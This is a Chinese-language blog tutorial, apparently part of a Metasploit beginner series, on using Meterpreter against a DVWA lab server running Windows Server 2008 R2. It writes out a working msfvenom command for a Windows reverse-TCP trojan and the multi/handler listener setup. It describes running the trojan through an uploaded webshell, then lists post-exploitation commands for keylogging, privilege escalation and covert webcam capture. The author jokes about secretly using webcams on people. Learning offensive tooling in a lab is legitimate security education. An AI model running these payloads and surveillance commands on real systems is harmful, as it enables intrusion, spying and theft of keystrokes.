热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Metasploit入门系列(八)——Meterpreter(一)

上次有小伙伴私信我,想看关于Armitage在Windows平台下的使用,这里简单解释下,Armitage你可以把它看作一个壳,你的所有操作其实还是使用的msfconsole接口的

《Metasploit入门系列(八)——Meterpreter(一)》

上次有小伙伴私信我,想看关于Armitage在Windows平台下的使用,这里简单解释下,Armitage你可以把它看作一个壳,你的所有操作其实还是使用的msfconsole接口的命令行,我也安装过windows下的msf,但实在用的不是很习惯,想想还要自己配开源数据库postgresql,脑瓜疼,虽然我也提到Armitage确实提供了多平台版本,但为一个gui实在没必要太折腾。

《Metasploit入门系列(八)——Meterpreter(一)》

明明鸟儿已经为你配置好啦一切,尽量还是放到linux上来吧。

小鸟用的好,局子进的早,嘤。

本期我们来简单介绍Meterpreter的一条龙使用,在后面的章节了我们会展开介绍Meterpreter下的基本命令及骚操作。

首先我们要明确一点,Meterpreter生成的payload,咳咳,木马就木马嘛,叫的那么好听QAQ。。。需要在目标服务器上成功运行是我们后续工作的基础,这就牵扯到了免杀的问题;然后目标服务器可能存在于内网内,并不具备公网ip,这就牵扯到了反弹shell的问题;再然后作为攻击者的你如果身处内网,如果你不具备路由管理的权限,然而又需要一个公网IP,那就牵扯到了反向代理的问题……

然后是跟团队大佬求证过的一个场景问题。如果我们是通过webshell上传的payload,那就牵扯到了提权的问题;如果我们是通过类似永恒之蓝等服务器漏洞拿到的shell,对于win7以上版本,可以考虑借助power shell下载我们放置于公网的payload,而对于纯cmd命令行环境,我们需要,,emmm,,尝试提权远程吧,如果你不嫌动静大的话;咳咳,或者干脆物理hack了解一下~

《Metasploit入门系列(八)——Meterpreter(一)》

所以,我为什么要碰Meterpreter这个大坑!!!想想后边的内容都脑瓜疼= =。

今天呢,我们就来介绍下针对web应用的msf一条龙搞事情~

《Metasploit入门系列(八)——Meterpreter(一)》

眼熟一下~此次的上传点选择DVWA吧,所在服务器是一台Windows server 2008R2。

《Metasploit入门系列(八)——Meterpreter(一)》

成功上传webshell并上传,,,,,唉?我在干啥?我在哪?忘做木马啦~@。@

在很多相关教程中,大家可能看到如下命令:’msfpayload’(荷载生成器),’msfencoder’(编码器),’msfcli’(监听接口),这只能说,你看的教程可能过期了,如今的msf讲上述命令统一归置到了’msfvenom’ 中。

此次我们的服务器目标十分明确,所以我们选择了针对Windows系统基于TCP的反弹shell:windows/meterpreter/reverse_tcp

使用msfvenom 生成我们所需要的payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.222.77 lport=1988 -f exe -o rabbit.exe

《Metasploit入门系列(八)——Meterpreter(一)》

其次,我们需要在msf中配置对应的payload服务端,使用exploit/multi/handler模块:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp      ##此次为所使用payload模块

set lhost 172.16.222.77                            ##同payload设置内容

set lport 1988                                           ##同payload设置内容

《Metasploit入门系列(八)——Meterpreter(一)》

刚刚我们也提到了,这是反向shell,所以在运行后我们讲开启怼本地所设置端口的监听,等待木马上线。

回到我们webshell的二次上传工作:

《Metasploit入门系列(八)——Meterpreter(一)》

通过webshell运行木马。

《Metasploit入门系列(八)——Meterpreter(一)》

我们可以看到,客户端已经上线,已拿到目标服务器shell。

《Metasploit入门系列(八)——Meterpreter(一)》

我们之前就提到过,Meterpreter是一种特殊的shell code(payload),它究竟有多么强大呢?

#screenshot 屏幕截图

《Metasploit入门系列(八)——Meterpreter(一)》

#keyscan_start 键盘记录开启

#keyscan_stop 键盘记录关闭

《Metasploit入门系列(八)——Meterpreter(一)》

#keyscan_dump 用于查看键盘记录期间抓取到的内容

《Metasploit入门系列(八)——Meterpreter(一)》

#getsystem  获得系统管理员权限

《Metasploit入门系列(八)——Meterpreter(一)》

#sysinfo 计算机操作系统和名称等的详细信息

《Metasploit入门系列(八)——Meterpreter(一)》

#webcam_snap  #通过摄像头拍照,emmm,算了,偶尔爆次照吧。

《Metasploit入门系列(八)——Meterpreter(一)》

#webcam_stream  #通过摄像头开启视频,emmm,这个不掩饰啦,简直撩小姐姐必备。

当然啦,Meterpreter的功能远远不止这些。关于它的针对不同系统不同协议的不同模块,以及各种常用命令介绍,我们放在后续的章节。真心希望更多的小伙伴可以受益于此。


推荐阅读
  • 如何配置Unturned服务器及其消息设置
    本文详细介绍了Unturned服务器的配置方法和消息设置技巧,帮助用户了解并优化服务器管理。同时,提供了关于云服务资源操作记录、远程登录设置以及文件传输的相关补充信息。 ... [详细]
  • 优化联通光猫DNS服务器设置
    本文详细介绍了如何为联通光猫配置DNS服务器地址,以提高网络解析效率和访问体验。通过智能线路解析功能,域名解析可以根据访问者的IP来源和类型进行差异化处理,从而实现更优的网络性能。 ... [详细]
  • 本文详细介绍如何使用Python进行配置文件的读写操作,涵盖常见的配置文件格式(如INI、JSON、TOML和YAML),并提供具体的代码示例。 ... [详细]
  • 在Linux系统中配置并启动ActiveMQ
    本文详细介绍了如何在Linux环境中安装和配置ActiveMQ,包括端口开放及防火墙设置。通过本文,您可以掌握完整的ActiveMQ部署流程,确保其在网络环境中正常运行。 ... [详细]
  • DNN Community 和 Professional 版本的主要差异
    本文详细解析了 DotNetNuke (DNN) 的两种主要版本:Community 和 Professional。通过对比两者的功能和附加组件,帮助用户选择最适合其需求的版本。 ... [详细]
  • Windows服务与数据库交互问题解析
    本文探讨了在Windows 10(64位)环境下开发的Windows服务,旨在定期向本地MS SQL Server (v.11)插入记录。尽管服务已成功安装并运行,但记录并未正确插入。我们将详细分析可能的原因及解决方案。 ... [详细]
  • 本文将介绍如何编写一些有趣的VBScript脚本,这些脚本可以在朋友之间进行无害的恶作剧。通过简单的代码示例,帮助您了解VBScript的基本语法和功能。 ... [详细]
  • 1:有如下一段程序:packagea.b.c;publicclassTest{privatestaticinti0;publicintgetNext(){return ... [详细]
  • 深入理解Cookie与Session会话管理
    本文详细介绍了如何通过HTTP响应和请求处理浏览器的Cookie信息,以及如何创建、设置和管理Cookie。同时探讨了会话跟踪技术中的Session机制,解释其原理及应用场景。 ... [详细]
  • 网络攻防实战:从HTTP到HTTPS的演变
    本文通过一系列日记记录了从发现漏洞到逐步加强安全措施的过程,探讨了如何应对网络攻击并最终实现全面的安全防护。 ... [详细]
  • MQTT技术周报:硬件连接与协议解析
    本周开发笔记重点介绍了在新项目中使用MQTT协议进行硬件连接的技术细节,涵盖其特性、原理及实现步骤。 ... [详细]
  • UNP 第9章:主机名与地址转换
    本章探讨了用于在主机名和数值地址之间进行转换的函数,如gethostbyname和gethostbyaddr。此外,还介绍了getservbyname和getservbyport函数,用于在服务器名和端口号之间进行转换。 ... [详细]
  • 本文介绍了如何在 DB2 环境中创建和删除数据库编目。创建编目是连接新数据库的必要步骤,涉及获取数据库连接信息、使用命令行工具进行配置,并验证连接的有效性。删除编目则用于移除不再需要的数据库连接。 ... [详细]
  • 本文介绍了如何在具备多个IP地址的FTP服务器环境中,通过动态地址端口复用和地址转换技术优化网络配置。重点讨论了2Mb/s DDN专线连接、Cisco 2611路由器及内部网络地址规划。 ... [详细]
  • 本文探讨了适用于Spring Boot应用程序的Web版SQL管理工具,这些工具不仅支持H2数据库,还能够处理MySQL和Oracle等主流数据库的表结构修改。 ... [详细]
author-avatar
巴萨小Q
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有